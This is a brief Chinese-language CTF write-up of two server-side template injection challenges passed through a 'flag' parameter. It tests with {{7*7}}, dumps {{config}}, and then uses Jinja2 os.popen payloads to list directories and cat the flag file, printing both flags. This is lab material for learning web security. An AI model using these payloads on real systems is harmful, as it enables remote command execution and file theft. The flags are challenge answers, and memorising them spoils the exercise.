第一题第二题都一样,都是简单的SSTI漏洞,这里告诉我们传入的参数是flag
这里试一下一个简单的payload:?flag={{7*7}}
结果回显了一个49,说明存在SSTI漏洞
其中第一题直接将payload改成?flag={{config}}就得到了flag
flag{a343a6c2f40d1d0cc3829aaac8d1e622}
然后便是第二题
第二题我们将payload改成?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../../').read() }}
读取系统文件(读取网站系统目录),发现了有这么多文件
然后一个一个目录查看发现flag有关信息在app目录下
查看目录格式如:?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
接着就是查看flag内容了
?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
flag{568bbbcdfe79e0827881e06e3a228574}